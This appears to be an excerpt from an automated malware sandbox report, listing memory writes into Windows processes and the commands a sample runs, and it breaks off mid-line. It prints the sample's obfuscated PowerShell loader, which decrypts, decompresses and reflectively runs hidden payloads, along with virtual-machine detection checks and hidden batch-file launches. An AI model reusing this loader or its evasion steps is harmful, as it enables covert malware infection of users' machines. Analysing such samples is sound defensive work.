Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 800000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: EB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1410000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1500000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1300000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 590000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 5D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1430000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: EA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: EB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1500000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1300000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 8B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1520000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 5D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 940000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1430000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1200000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: EA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 790000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 410000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1370000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 8B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1520000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 420000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 940000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1200000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 390000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 410000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C06C9A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1370000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2CA6EDC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A6F2BD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1EC29790000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 25235280000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21EC07B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C06C9A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 2527DEB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2CA6EDC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A6F2BD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 286D7CE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1EC29790000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 257A8150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 25235280000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1908C4A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1D547800000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21EC07B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 286D7CE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 257A8150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1908C4D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1D547800000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 19192FE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 19193100000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 29BC05B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1FAFFD50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2271B950000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22735E70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1DAF18C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1DAF1910000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2127EAE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 176E8750000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28CD8B30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28CF3050000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 2612B210000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 2612B210000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22735C40000
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\payload.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object 